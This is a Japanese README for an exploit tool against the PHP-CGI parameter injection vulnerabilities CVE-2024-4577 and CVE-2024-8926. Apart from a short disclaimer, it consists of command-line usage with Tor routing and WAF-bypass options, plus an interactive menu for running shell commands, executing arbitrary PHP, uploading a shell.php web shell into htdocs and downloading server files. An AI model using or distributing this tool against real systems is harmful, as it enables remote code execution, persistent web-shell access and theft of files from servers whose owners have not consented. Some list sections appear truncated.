
CVE-2024-4577およびCVE-2024-8926をテストするためのセキュリティ侵入テストツール
🚀 CVE-2024-4577 & CVE-2024-8926 Exploit Tool
PHP-CGI パラメータインジェクション脆弱性 に対する自動化テストツールです。CVE-2024-4577 と CVE-2024-8926 をサポートし、コマンド実行、ファイルアップロード、ダウンロード などの操作が可能です。
本ツールは PHP-CGI 環境におけるパラメータインジェクション脆弱性 のテストに使用でき、以下を提供します:
本ツールは合法的なテストおよび学術目的にのみ使用し、許可のないシステムへの使用は禁止されています!
⚠️ 不正使用は法的責任を負うことになります!
本ツールは以下の用途にのみ提供されます:
本ツールは以下の Python パッケージに依存しています。先にインストールしてください:
pip install -r requirements.txt
または手動でインストール:
pip install requests requests-tor chardet urllib3 rich
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
例:
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
| パラメータ | 説明 | 例 |
|---|---|---|
-u 、 --url | ターゲットURLを指定 | -u http://example.com |
--timeout sec | リクエストタイムアウトを設定(0は無制限) | --timeout 30 |
--log | シェルコマンドを自動記録 | --log |
--payload | Payload の組み合わせを指定またはカスタム | --payload 2 |
--tor | Tor 経由でリクエストを送信 | --tor |
--verbose | 詳細情報を表示 | --verbose |
--bypass | WAF バイパスモードを有効化 | --bypass |
--force | エクスプロイトモードを強制起動 | --force |
--cgipoint PATHS | テストする特定の CGI パスを指定 | --cgipoint /path |
--delay sec | リクエスト間の遅延秒数 | --delay 1.5 |
--no-effects | すべてのアニメーションと遅延効果を無効化 | --no-effects |
スクリプトが脆弱性を発見すると、メニューが表示されます:
╭──────────── Exploit モードメニュー ────────────╮
│ 現在のターゲット:http://example.com/ │
│ 現在のインジェクションポイント:/php-cgi/php-cgi.exe │
│ 脆弱性ID:CVE-2024-4577 │
╰──────────────────────────────────────────────────╯
1) 🧪 シェルモード
2) 🛠️ PHPカスタムモード
3) 📤 ファイルアップロード
4) 📥 ファイルダウンロード
5) 🎯 攻撃ターゲットの切り替え
6) ⚙️ パラメータ設定
7) ❌ プログラム終了
>>
システムコマンド を実行します:
shell> whoami
📂 出力の保存
shell> whoami --save
shell> whoami --save C:\output\whoami.txt
カスタム PHP コード を実行します:
phpinfo();
EOF
📂 出力の保存
phpinfo();
EOF --save
phpinfo();
EOF --save C:\output\info.html
ローカルファイルパス:C:\test\shell.php
ターゲットの完全パス:
[*] アップロードパスを自動設定しました: C:/xampp/htdocs/shell.php
📂 手動でパスを指定
ターゲットの完全パス:C:\xampp\php\shell.php
リモートファイルパス:C:\xampp\htdocs\index.php
📂 ダウンロードしたファイルは download/ に保存され、重複がある場合は自動的に番号が付与されます
[*] ファイルのダウンロードが完了しました。download/index.php に保存されています
新しいターゲットURLを入力: http://newtarget.com
🔹 脆弱性の再テストが行われます
[⚙️ エクスプロイト段階のパラメータ設定メニュー]
1) ペイロードを切り替え 1
2) バイパスモジュール 未選択
3) タイムアウト 10 秒
4) リクエスト遅延 0 秒
5) 自動記録 オフ
6) 詳細モード オフ
7) アニメーション効果 オン
8) 強制利用 オフ
9) 保存して Exploit メニューに戻る
以下のバイパス戦略を提供します:
php://input を別の記法に置き換え